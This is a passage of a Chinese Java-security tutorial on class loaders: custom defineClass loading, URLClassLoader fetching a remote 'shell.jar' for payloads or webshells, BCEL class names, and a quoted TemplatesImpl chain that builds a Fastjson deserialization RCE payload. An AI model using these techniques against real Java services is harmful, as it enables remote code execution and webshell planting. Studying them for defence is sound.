<span class="line"><span>    private static final byte[] testClassBytes = Base64.getDecoder().decode(&quot;yv66vgAAADQAHAoACAARBwASCgACABEIABMKAAIAFAoAAgAVBwAWBwAXAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEABWhlbGxvAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAApTb3VyY2VGaWxlAQAKSGVsbG8uamF2YQwACQAKAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIBAAZIZWxsbyAMABgAGQwAGgAbAQASdG9wL2xvbmdsb25lL0hlbGxvAQAQamF2YS9sYW5nL09iamVjdAEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsAIQAHAAgAAAAAAAIAAQAJAAoAAQALAAAAHQABAAEAAAAFKrcAAbEAAAABAAwAAAAGAAEAAAADAAEADQAOAAEACwAAACwAAgACAAAAFLsAAlm3AAMSBLYABSu2AAW2AAawAAAAAQAMAAAABgABAAAABQABAA8AAAACABA=&quot;);</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    @Override</span></span>
<span class="line"><span>    protected Class&lt;?&gt; findClass(String name) throws ClassNotFoundException {</span></span>
<span class="line"><span>        if (name.equals(testClassName)) {</span></span>
<span class="line"><span>            return defineClass(testClassName, testClassBytes, 0, testClassBytes.length);</span></span>
<span class="line"><span>        }</span></span>
<span class="line"><span>        return super.findClass(name);</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    public static void main(String[] args) throws Exception {</span></span>
<span class="line"><span>        ClassLoaderStudy loader = new ClassLoaderStudy();</span></span>
<span class="line"><span>        Class testClass = loader.loadClass(testClassName);</span></span>
<span class="line"><span>        Object o = testClass.newInstance();</span></span>
<span class="line"><span>        Method sayHello = o.getClass().getMethod(&quot;hello&quot;, String.class);</span></span>
<span class="line"><span>        String longlone = (String) sayHello.invoke(o, &quot;Longlone&quot;);</span></span>
<span class="line"><span>        System.out.println(longlone);</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span>}</span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>我们要继承ClassLoader类和覆盖findClass()方法.其中最核心的逻辑是defineClass方法</p><div class="language- line-numbers-mode" data-highlighter="shiki" data-ext="" data-title="" style="--shiki-light:#383A42;--shiki-dark:#abb2bf;--shiki-light-bg:#FAFAFA;--shiki-dark-bg:#282c34;"><pre class="shiki shiki-themes one-light one-dark-pro vp-code"><code><span class="line"><span>protected final Class&lt;?&gt; defineClass(byte[] b, int off, int len)</span></span>
<span class="line"><span>        throws ClassFormatError</span></span>
<span class="line"><span>    {</span></span>
<span class="line"><span>        return defineClass(null, b, off, len, null);</span></span>
<span class="line"><span>    }</span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><ul><li>String name： 这是类的全限定名。在类加载器的作用下，该类将会被加载到Java虚拟机中。</li><li>byte b： 这是一个字节数组，包含了一个类的字节码。这个字节数组通常是通过读取一个类文件（以 .class 结尾的文件）获得的。字节码数组应该包含有效的Java类文件的内容。</li><li>int off：这是字节数组 b 中的起始偏移量，表示开始转换的位置。</li><li>int len： 这是要转换的字节数，表示从偏移量 off 处开始的连续字节的长度。</li></ul><h4 id="urlclassloader类" tabindex="-1"><a class="header-anchor" href="#urlclassloader类"><span>URLClassLoader类</span></a></h4><h5 id="快速概览" tabindex="-1"><a class="header-anchor" href="#快速概览"><span>快速概览</span></a></h5><p>RLClassLoader继承了ClassLoader，URLClassLoader提供了加载远程资源的能力，在写漏洞利用的payload或者webshell的时候我们可以使用这个特性来加载远程的jar来实现远程的类方法调用。注意这里使用JAR包,如果使用class文件,必须本地存在对应的类才行.</p><div class="language-java line-numbers-mode" data-highlighter="shiki" data-ext="java" data-title="java" style="--shiki-light:#383A42;--shiki-dark:#abb2bf;--shiki-light-bg:#FAFAFA;--shiki-dark-bg:#282c34;"><pre class="shiki shiki-themes one-light one-dark-pro vp-code"><code><span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">import</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;"> java.net.URL</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">;</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">import</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;"> java.net.URLClassLoader</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">;</span></span>
<span class="line"></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">public</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> class</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;"> RemoteClassLoaderExample</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> {</span></span>
<span class="line"></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">    public</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> static</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> void</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;"> main</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">String</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">[] </span><span style="--shiki-light:#383A42;--shiki-light-font-style:inherit;--shiki-dark:#E06C75;--shiki-dark-font-style:italic;">args</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">)</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> {</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">        try</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> {</span></span>
<span class="line"><span style="--shiki-light:#A0A1A7;--shiki-light-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic;">            // 远程 class 文件的 URL</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">            URL</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> remoteUrl</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> new</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;"> URL</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;">&quot;http://127.0.0.1:8086/shell.jar&quot;</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">);</span></span>
<span class="line"></span>
<span class="line"><span style="--shiki-light:#A0A1A7;--shiki-light-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic;">            // 创建 URL 数组</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">            URL</span><span style="--shiki-light:#E45649;--shiki-dark:#ABB2BF;">[] </span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;">urls</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> new</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;"> URL</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">[]{remoteUrl};</span></span>
<span class="line"></span>
<span class="line"><span style="--shiki-light:#A0A1A7;--shiki-light-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic;">            // 创建 URLClassLoader 对象</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">            URLClassLoader</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> classLoader</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> new</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;"> URLClassLoader</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(urls);</span></span>
<span class="line"></span>
<span class="line"><span style="--shiki-light:#A0A1A7;--shiki-light-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic;">            // 加载远程类</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">            Class</span><span style="--shiki-light:#E45649;--shiki-dark:#ABB2BF;">&lt;</span><span style="--shiki-light:#C18401;--shiki-dark:#C678DD;">?</span><span style="--shiki-light:#E45649;--shiki-dark:#ABB2BF;">&gt; </span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;">remoteClass</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;"> classLoader</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">loadClass</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;">&quot;Test2&quot;</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">);</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">            Object</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> instance</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;"> remoteClass</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">getDeclaredConstructor</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">().</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">newInstance</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">();</span></span>
<span class="line"></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">        } </span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">catch</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> (</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">Exception</span><span style="--shiki-light:#383A42;--shiki-light-font-style:inherit;--shiki-dark:#E06C75;--shiki-dark-font-style:italic;"> e</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">) {</span></span>
<span class="line"><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">            e</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">printStackTrace</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">();</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">        }</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">    }</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">}</span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><figure><img src="https://cdn.nlark.com/yuque/0/2024/png/27874700/1708938815728-9760af7b-1ba7-4e13-81d6-d4173e319ace.png#averageHue=%2323252b&amp;clientId=u1907886b-bade-4&amp;from=paste&amp;height=487&amp;id=u9d5071dc&amp;originHeight=536&amp;originWidth=2152&amp;originalType=binary&amp;ratio=1.100000023841858&amp;rotation=0&amp;showTitle=false&amp;size=172963&amp;status=done&amp;style=none&amp;taskId=u7aeed246-1c3c-4aff-b1dc-a7750b4160e&amp;title=&amp;width=1956.3635939605974" alt="image.png" tabindex="0" loading="lazy"><figcaption>image.png</figcaption></figure><h4 id="漏洞实例" tabindex="-1"><a class="header-anchor" href="#漏洞实例"><span>漏洞实例</span></a></h4><p>C3P0中的URLClassLoader类攻击</p><h4 id="bcel-classloader" tabindex="-1"><a class="header-anchor" href="#bcel-classloader"><span>BCEL ClassLoader</span></a></h4><p>BCEL的类加载器在解析类名时会对ClassName中有<code>$$BCEL$$</code>标识的类做特殊处理</p><div class="language- line-numbers-mode" data-highlighter="shiki" data-ext="" data-title="" style="--shiki-light:#383A42;--shiki-dark:#abb2bf;--shiki-light-bg:#FAFAFA;--shiki-dark-bg:#282c34;"><pre class="shiki shiki-themes one-light one-dark-pro vp-code"><code><span class="line"><span>package MemoryShell.BCEL;</span></span>
<span class="line"><span></span></span>
<span class="line"><span>import com.sun.org.apache.bcel.internal.Repository;</span></span>
<span class="line"><span>import com.sun.org.apache.bcel.internal.classfile.JavaClass;</span></span>
<span class="line"><span>import com.sun.org.apache.bcel.internal.classfile.Utility;</span></span>
<span class="line"><span>import com.sun.org.apache.bcel.internal.util.ClassLoader;</span></span>
<span class="line"><span></span></span>
<span class="line"><span></span></span>
<span class="line"><span>public class BCELDemo {</span></span>
<span class="line"><span>    public static void main(String[] args) throws Exception {</span></span>
<span class="line"><span></span></span>
<span class="line"><span>         JavaClass cls = Repository.lookupClass(calc.class);</span></span>
<span class="line"><span>         String code = Utility.encode(cls.getBytes(), true);</span></span>
<span class="line"><span>         System.out.println(code);</span></span>
<span class="line"><span></span></span>
<span class="line"><span>         new ClassLoader().loadClass(&quot;$$BCEL$$&quot; + code).newInstance();</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span>}</span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><h4 id="xalan-classloader类" tabindex="-1"><a class="header-anchor" href="#xalan-classloader类"><span>Xalan ClassLoader类</span></a></h4><p>这里其实就是使用Xalan的自定义的defineClass来实现类加载 这里借用大佬的代码 https://www.javasec.org/javase/ClassLoader/</p><div class="language- line-numbers-mode" data-highlighter="shiki" data-ext="" data-title="" style="--shiki-light:#383A42;--shiki-dark:#abb2bf;--shiki-light-bg:#FAFAFA;--shiki-dark-bg:#282c34;"><pre class="shiki shiki-themes one-light one-dark-pro vp-code"><code><span class="line"><span>package com.anbai.sec.classloader;</span></span>
<span class="line"><span></span></span>
<span class="line"><span>import com.alibaba.fastjson.JSON;</span></span>
<span class="line"><span>import com.alibaba.fastjson.parser.Feature;</span></span>
<span class="line"><span>import com.alibaba.fastjson.parser.ParserConfig;</span></span>
<span class="line"><span>import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;</span></span>
<span class="line"><span>import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;</span></span>
<span class="line"><span></span></span>
<span class="line"><span>import java.lang.reflect.Constructor;</span></span>
<span class="line"><span>import java.lang.reflect.Field;</span></span>
<span class="line"><span>import java.util.LinkedHashMap;</span></span>
<span class="line"><span>import java.util.Map;</span></span>
<span class="line"><span>import java.util.Properties;</span></span>
<span class="line"><span></span></span>
<span class="line"><span>import static org.apache.commons.codec.binary.Base64.encodeBase64String;</span></span>
<span class="line"><span></span></span>
<span class="line"><span>public class XalanTemplatesImpl {</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    /**</span></span>
<span class="line"><span>     * com.anbai.sec.classloader.TestAbstractTranslet类字节码</span></span>
<span class="line"><span>     */</span></span>
<span class="line"><span>    public static final byte[] CLASS_BYTES = new byte[]{</span></span>
<span class="line"><span>            -54, -2, -70, -66 // .... 因字节码过长此处省略，完整代码请参考：https://github.com/javaweb-sec/javaweb-sec/blob/master/javaweb-sec-source/javase/src/main/java/com/anbai/sec/classloader/XalanTemplatesImpl.java</span></span>
<span class="line"><span>    };</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    /**</span></span>
<span class="line"><span>     * 使用反射修改TemplatesImpl类的成员变量方式触发命令执行，Jackson和Fastjson采用这种方式触发RCE</span></span>
<span class="line"><span>     *</span></span>
<span class="line"><span>     * @throws Exception 调用异常</span></span>
<span class="line"><span>     */</span></span>
<span class="line"><span>    public static void invokeField() throws Exception {</span></span>
<span class="line"><span>        TemplatesImpl template      = new TemplatesImpl();</span></span>
<span class="line"><span>        Class&lt;?&gt;      templateClass = template.getClass();</span></span>
<span class="line"><span></span></span>
<span class="line"><span>        // 获取需要修改的成员变量</span></span>
<span class="line"><span>        Field byteCodesField        = templateClass.getDeclaredField(&quot;_bytecodes&quot;);</span></span>
<span class="line"><span>        Field nameField             = templateClass.getDeclaredField(&quot;_name&quot;);</span></span>
<span class="line"><span>        Field tFactoryField         = templateClass.getDeclaredField(&quot;_tfactory&quot;);</span></span>
<span class="line"><span>        Field outputPropertiesField = templateClass.getDeclaredField(&quot;_outputProperties&quot;);</span></span>
<span class="line"><span></span></span>
<span class="line"><span>        // 修改成员属性访问权限</span></span>
<span class="line"><span>        byteCodesField.setAccessible(true);</span></span>
<span class="line"><span>        nameField.setAccessible(true);</span></span>
<span class="line"><span>        tFactoryField.setAccessible(true);</span></span>
<span class="line"><span>        outputPropertiesField.setAccessible(true);</span></span>
<span class="line"><span></span></span>
<span class="line"><span>        // 设置类字节码</span></span>
<span class="line"><span>        byteCodesField.set(template, new byte[][]{CLASS_BYTES});</span></span>
<span class="line"><span></span></span>
<span class="line"><span>        // 设置名称</span></span>
<span class="line"><span>        nameField.set(template, &quot;&quot;);</span></span>
<span class="line"><span></span></span>
<span class="line"><span>        // 设置TransformerFactoryImpl实例</span></span>
<span class="line"><span>        tFactoryField.set(template, new TransformerFactoryImpl());</span></span>
<span class="line"><span></span></span>
<span class="line"><span>        // 设置Properties配置</span></span>
<span class="line"><span>        outputPropertiesField.set(template, new Properties());</span></span>
<span class="line"><span></span></span>
<span class="line"><span>        // 触发defineClass调用链：</span></span>
<span class="line"><span>        //   getOutputProperties-&gt;newTransformer-&gt;getTransletInstance-&gt;defineTransletClasses-&gt;defineClass</span></span>
<span class="line"><span>        // 触发命令执行调用链：</span></span>
<span class="line"><span>        //   getOutputProperties-&gt;newTransformer-&gt;getTransletInstance-&gt;new TestAbstractTranslet-&gt;Runtime#exec</span></span>
<span class="line"><span>        template.getOutputProperties();</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    /**</span></span>
<span class="line"><span>     * 使用反射调用TemplatesImpl类的私有构造方法方式触发命令执行</span></span>
<span class="line"><span>     *</span></span>
<span class="line"><span>     * @throws Exception 调用异常</span></span>
<span class="line"><span>     */</span></span>
<span class="line"><span>    public static void invokeConstructor() throws Exception {</span></span>
<span class="line"><span>        // 获取TemplatesImpl构造方法</span></span>
<span class="line"><span>        Constructor&lt;TemplatesImpl&gt; constructor = TemplatesImpl.class.getDeclaredConstructor(</span></span>
<span class="line"><span>                byte[][].class, String.class, Properties.class, int.class, TransformerFactoryImpl.class</span></span>
<span class="line"><span>        );</span></span>
<span class="line"><span></span></span>
<span class="line"><span>        // 修改访问权限</span></span>
<span class="line"><span>        constructor.setAccessible(true);</span></span>
<span class="line"><span></span></span>
<span class="line"><span>        // 创建TemplatesImpl实例</span></span>
<span class="line"><span>        TemplatesImpl template = constructor.newInstance(</span></span>
<span class="line"><span>                new byte[][]{CLASS_BYTES}, &quot;&quot;, new Properties(), -1, new TransformerFactoryImpl()</span></span>
<span class="line"><span>        );</span></span>
<span class="line"><span></span></span>
<span class="line"><span>        template.getOutputProperties();</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    /**</span></span>
<span class="line"><span>     * Fastjson 1.2.2 - 1.2.4反序列化RCE示例</span></span>
<span class="line"><span>     */</span></span>
<span class="line"><span>    public static void fastjsonRCE() {</span></span>
<span class="line"><span>        // 构建恶意的JSON</span></span>
<span class="line"><span>        Map&lt;String, Object&gt; dataMap = new LinkedHashMap&lt;String, Object&gt;();</span></span>
<span class="line"><span>        dataMap.put(&quot;@type&quot;, TemplatesImpl.class.getName());</span></span>
<span class="line"><span>        dataMap.put(&quot;_bytecodes&quot;, new String[]{encodeBase64String(CLASS_BYTES)});</span></span>
<span class="line"><span>        dataMap.put(&quot;_name&quot;, &quot;&quot;);</span></span>
<span class="line"><span>        dataMap.put(&quot;_tfactory&quot;, new Object());</span></span>
<span class="line"><span>        dataMap.put(&quot;_outputProperties&quot;, new Object());</span></span>
<span class="line"><span></span></span>
<span class="line"><span>        // 生成Payload</span></span>
<span class="line"><span>        String json = JSON.toJSONString(dataMap);</span></span>
<span class="line"><span>        System.out.println(json);</span></span>
<span class="line"><span></span></span>
<span class="line"><span>        // 使用FastJson反序列化，但必须启用SupportNonPublicField特性</span></span>
<span class="line"><span>        JSON.parseObject(json, Object.class, new ParserConfig(), Feature.SupportNonPublicField);</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    public static void main(String[] args) throws Exception {</span></span>
<span class="line"><span>//      invokeField();</span></span>
<span class="line"><span>//      invokeConstructor();</span></span>
<span class="line"><span>        fastjsonRCE();</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span></span></span>
<span class="line"><span>}</span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><h2 id="自定义类加载器" tabindex="-1"><a class="header-anchor" href="#自定义类加载器"><span>自定义类加载器</span></a></h2><p>除开上文提到的三种加载器,我们还可以自定义加载器.</p><div class="language- line-numbers-mode" data-highlighter="shiki" data-ext="" data-title="" style="--shiki-light:#383A42;--shiki-dark:#abb2bf;--shiki-light-bg:#FAFAFA;--shiki-dark-bg:#282c34;"><pre class="shiki shiki-themes one-light one-dark-pro vp-code"><code><span class="line"><span>public class ClassLoaderStudy extends ClassLoader {</span></span>
<span class="line"><span>    private static final String testClassName = &quot;top.longlone.Hello&quot;;</span></span>
<span class="line"><span>   </span></span>
<span class="line"><span>    private static final byte[] testClassBytes = Base64.getDecoder().decode(&quot;yv66vgAAADQAHAoACAARBwASCgACABEIABMKAAIAFAoAAgAVBwAWBwAXAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEABWhlbGxvAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAApTb3VyY2VGaWxlAQAKSGVsbG8uamF2YQwACQAKAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIBAAZIZWxsbyAMABgAGQwAGgAbAQASdG9wL2xvbmdsb25lL0hlbGxvAQAQamF2YS9sYW5nL09iamVjdAEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsAIQAHAAgAAAAAAAIAAQAJAAoAAQALAAAAHQABAAEAAAAFKrcAAbEAAAABAAwAAAAGAAEAAAADAAEADQAOAAEACwAAACwAAgACAAAAFLsAAlm3AAMSBLYABSu2AAW2AAawAAAAAQAMAAAABgABAAAABQABAA8AAAACABA=&quot;);</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    @Override</span></span>
<span class="line"><span>    protected Class&lt;?&gt; findClass(String name) throws ClassNotFoundException {</span></span>
<span class="line"><span>        if (name.equals(testClassName)) {</span></span>
<span class="line"><span>            return defineClass(testClassName, testClassBytes, 0, testClassBytes.length);</span></span>
<span class="line"><span>        }</span></span>
<span class="line"><span>        return super.findClass(name);</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    public static void main(String[] args) throws Exception {</span></span>
<span class="line"><span>        ClassLoaderStudy loader = new ClassLoaderStudy();</span></span>
<span class="line"><span>        Class testClass = loader.loadClass(testClassName);</span></span>
<span class="line"><span>        Object o = testClass.newInstance();</span></span>
<span class="line"><span>        Method sayHello = o.getClass().getMethod(&quot;hello&quot;, String.class);</span></span>
<span class="line"><span>        String longlone = (String) sayHello.invoke(o, &quot;Longlone&quot;);</span></span>
<span class="line"><span>        System.out.println(longlone);</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span>}</span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>我们要继承ClassLoader类和覆盖findClass()方法.其中最核心的逻辑是defineClass方法</p><div class="language- line-numbers-mode" data-highlighter="shiki" data-ext="" data-title="" style="--shiki-light:#383A42;--shiki-dark:#abb2bf;--shiki-light-bg:#FAFAFA;--shiki-dark-bg:#282c34;"><pre class="shiki shiki-themes one-light one-dark-pro vp-code"><code><span class="line"><span>protected final Class&lt;?&gt; defineClass(byte[] b, int off, int len)</span></span>
<span class="line"><span>        throws ClassFormatError</span></span>
<span class="line"><span>    {</span></span>
<span class="line"><span>        return defineClass(null, b, off, len, null);</span></span>
